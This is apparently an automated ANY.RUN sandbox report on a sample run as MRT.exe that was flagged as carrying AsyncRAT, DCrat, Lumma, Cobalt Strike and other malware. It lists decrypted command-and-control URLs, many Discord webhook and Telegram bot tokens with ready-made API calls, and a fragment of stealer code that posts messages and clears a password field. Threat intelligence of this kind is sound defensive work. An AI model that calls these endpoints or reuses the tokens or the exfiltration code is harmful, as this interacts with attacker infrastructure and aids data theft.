Malware analysis https://www.microsoft.com/ja-jp/download/details.aspx?id=9905 Malicious activity

Add for printing

URL:	https://www.microsoft.com/ja-jp/download/details.aspx?id=9905
Full analysis:	https://app.any.run/tasks/bcf4cb3b-f238-404b-a0a6-79eaa093d80b
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks. DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. MassLogger is a credential stealer and keylogger first identified in April 2020. It has been actively used in cyber campaigns to exfiltrate sensitive information from compromised systems. It is designed for easy use by less tech-savvy actors and is prominent for the capability of spreading via USB drives. It targets both individuals and organizations in various industries, mostly in Europe and the USA. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	December 25, 2025, 05:05:21
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	stealer anti-evasion xor-url generic susp-powershell crypto-regex dcrat cobaltstrike lumma ims-api emmenhtal goinjector masslogger mimikatz tool m0yv atlantida mint cve-2022-30190 exploit themida pecompact xmrig upx pyinstaller antivm asyncrat
Indicators:
MD5:	ACDF9772BD4B1AFFBCE69CE533F169F7
SHA1:	346A0915722F40E86C6CB6464CB45E4D9ABF8650
SHA256:	19B910DA840B51A3A2FDA4945AD291A65D61D71E65DA4FD94256B63A9352ED18
SSDEEP:	3:N8DSLZRtRxVazk2EIM/q9Q:2OLTDQEIK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- XORed URL has been found (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Actions looks like stealing of personal data
  - MRT.exe (PID: 4628)
  - MRT.exe (PID: 5764)
- DCRAT has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- LUMMA has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- COBALTSTRIKE has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- M0YV has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- MASSLOGGER has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- EMMENHTAL has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- GOINJECTOR has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- MIMIKATZ has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Steals Discord credentials and data (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- ATLANTIDA has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- MINT has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- CVE-2022-30190 detected
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- XMRIG has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- ASYNCRAT has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
SUSPICIOUS
- Executable content was dropped or overwritten
  - MRT.exe (PID: 4628)
  - MRT.exe (PID: 5764)
- Found regular expressions for crypto-addresses (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- The process verifies whether the antivirus software is installed
  - MRT.exe (PID: 4628)
  - MRT.exe (PID: 5764)
- Possible usage of Discord/Telegram API has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- The process checks if it is being run in the virtual environment
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Multiple wallet extension IDs have been found
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- There is functionality for VM detection antiVM strings (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- There is functionality for taking screenshot (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Searches for installed software
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
INFO
- Application launched itself
  - msedge.exe (PID: 7592)
- Reads Environment values
  - identity_helper.exe (PID: 7392)
- Reads security settings of Internet Explorer
  - MRT.exe (PID: 4628)
  - MRT.exe (PID: 5764)
- Reads the computer name
  - identity_helper.exe (PID: 7392)
- Checks supported languages
  - Windows-KB890830-x64-V5.137.exe.exe (PID: 8988)
  - identity_helper.exe (PID: 7392)
  - Windows-KB890830-x64-V5.137.exe.exe (PID: 8880)
- The sample compiled with english language support
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Executable content was dropped or overwritten
  - msedge.exe (PID: 7592)
- Found Base64 encoded access to environment variables via PowerShell (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Found Base64 encoded network access via PowerShell (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Found Base64 encoded reflection usage via PowerShell (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Found Base64 encoded file access via PowerShell (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- PECompact has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Themida protector has been detected
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- PyInstaller has been detected (YARA)
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- UPX packer has been detected
  - MRT.exe (PID: 5764)
  - MRT.exe (PID: 4628)
- Checks proxy server information
  - slui.exe (PID: 3488)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

xor-url

(PID) Process(5764) MRT.exe

Decrypted-URLs (1)http://khamenei.cogia.net/y.phpD

Decrypted-URLs (1)http://dawateislami.net/html/fonts/taskkill

Decrypted-URLs (2)http://creatonprojects.com/drv32.data

http://powermpeg.com/

Decrypted-URLs (1)http://mm.21380.com/t/sleepdown/updatew

(PID) Process(4628) MRT.exe

Decrypted-URLs (1)http://khamenei.cogia.net/y.phpD

Decrypted-URLs (1)http://dawateislami.net/html/fonts/taskkill

Decrypted-URLs (2)http://creatonprojects.com/drv32.data

http://powermpeg.com/

Decrypted-URLs (1)http://mm.21380.com/t/sleepdown/updatew

ims-api

(PID) Process(5764) MRT.exe

Discord-Webhook-Tokens (1)1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Discord-Info-Links

1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Get Webhook Infohttps://discord.com/api/webhooks/1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Telegram-Tokens (1)7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Telegram-Info-Links

7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Get info about bothttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getMe

Get incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getUpdates

Get webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook?drop_pending_updates=true

Telegram-Tokens (1)8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Telegram-Info-Links

8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Get info about bothttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getMe

Get incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getUpdates

Get webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook?drop_pending_updates=true

Discord-Webhook-Tokens (1)757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Discord-Info-Links

757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Get Webhook Infohttps://discord.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Discord-Webhook-Tokens (1)770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Discord-Info-Links

770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Get Webhook Infohttps://discord.com/api/webhooks/770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Telegram-Tokens (1)6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Telegram-Info-Links

6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Get info about bothttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getMe

Get incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getUpdates

Get webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

End-PointsendMessage

Args

Telegram-Tokens (1)6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Telegram-Info-Links

6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Get info about bothttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getMe

Get incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getUpdates

Get webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

End-Pointsendmessage

Args

Telegram-Tokens (1)6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Telegram-Info-Links

6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Get info about bothttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getMe

Get incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getUpdates

Get webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"]

Telegram-Tokens (1)7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

Telegram-Info-Links

7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

Get info about bothttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getMe

Get incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getUpdates

Get webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"];

Discord-Webhook-Tokens (1)1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Discord-Info-Links

1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Get Webhook Infohttps://discord.com/api/webhooks/1109437421331943467/r3lngrry37ry5cone7dwkukqiz2nnr9ecz8et5wqcowerj32bqhbz9w3otdsefgqcwep

Discord-Webhook-Tokens (1)1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Discord-Info-Links

1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Get Webhook Infohttps://discord.com/api/webhooks/1198720468656607305/dm6almcmhiy-uqgkbeyzl4lzgy-n6g_2q4x-r44ybt3d2kxoheaxvq38gbbq3t14t7he

Telegram-Tokens (1)7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Telegram-Info-Links

7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

Get info about bothttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getMe

Get incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getUpdates

Get webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7556593612:aafzgxqyc6jokyixx7z8pjv41kml1f3sa_c

End-Pointsendmessage

Args

Telegram-Tokens (1)8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Telegram-Info-Links

8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

Get info about bothttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getMe

Get incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getUpdates

Get webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token8095899921:aaelyqcepj7agxzj24e4np9le8hjy0tjk0e

End-Pointsendmessage

Args

Telegram-Tokens (1)6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Telegram-Info-Links

6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

Get info about bothttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getMe

Get incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getUpdates

Get webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6616481542:aafhufvwi5drycosjpc1fsfif_lbtu2pu7a

End-Pointsendmessage

Args

chat_id (1)6643273432

text (1)new-result=>new:bynbf:=${message}`,{method:"get"}).then(success=>{},error=>{alert('messagenotsent')console.log(error)})document.getelementbyid("password").value="";console.log("yesssss")

Discord-Webhook-Tokens (1)1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Discord-Info-Links

1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

Get Webhook Infohttps://discord.com/api/webhooks/1407247298475593859/n5ncwqiw6jq1n4osjeivckp0eqandtgtzc7fgixffhokn8ptv2whxsrc2o--mt793c8u

(PID) Process(4628) MRT.exe

Discord-Webhook-Tokens (1)1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Discord-Info-Links

1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Get Webhook Infohttps://discord.com/api/webhooks/1204220382094168145/anpobLsMQf9X7wjCwVR3wiFeqzMNRHXz07QubMDY6LjhZSG7apvQUUOf5T3_Z0iCvhxF

Telegram-Tokens (1)7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Telegram-Info-Links

7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8

Get info about bothttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getMe

Get incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getUpdates

Get webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7992209782:AAGGIq74uLvUAS0kO8zUsKMGIJnCpGfg8w8/deleteWebhook?drop_pending_updates=true

Telegram-Tokens (1)8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Telegram-Info-Links

8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno

Get info about bothttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getMe

Get incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getUpdates

Get webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot8126364945:AAFaNtu4jXkeIw2ZEf-ygjcKOHWmULAkzno/deleteWebhook?drop_pending_updates=true

Discord-Webhook-Tokens (1)757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Discord-Info-Links

757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Get Webhook Infohttps://discord.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0caWiSJudDLY4XhpV64IEvFz

Discord-Webhook-Tokens (1)770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Discord-Info-Links

770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Get Webhook Infohttps://discord.com/api/webhooks/770716126988599316/o7gxyebupqzx7rqfud4ctopmq2ggicypomynpfvqsib9qyvw2bgz4mmt6c7jvgedo5y6

Telegram-Tokens (1)6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Telegram-Info-Links

6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

Get info about bothttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getMe

Get incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getUpdates

Get webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6766432184:aah7svaewk_j9o2o2mibghbgw_g77gx8meo

End-Pointsendmessage

Args

Telegram-Tokens (1)6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Telegram-Info-Links

6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

Get info about bothttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getMe

Get incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getUpdates

Get webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6115740549:AAGbdtUe6dYkRqVTUBXwsUf8JMRY8cAMiNI

End-PointsendMessage

Args

Telegram-Tokens (1)6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Telegram-Info-Links

6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

Get info about bothttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getMe

Get incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getUpdates

Get webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token6989057172:aaflrv_iwsmb1-cc64puz7ki_jyka8br2fu

End-Pointsendmessage

Args

chat_id (1)6481270908

text (1)","get","open","send"]

Telegram-Tokens (1)7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

Telegram-Info-Links

7265715971:aaemubcxbzbsrfahqpw65ub-4tgxiaaeade

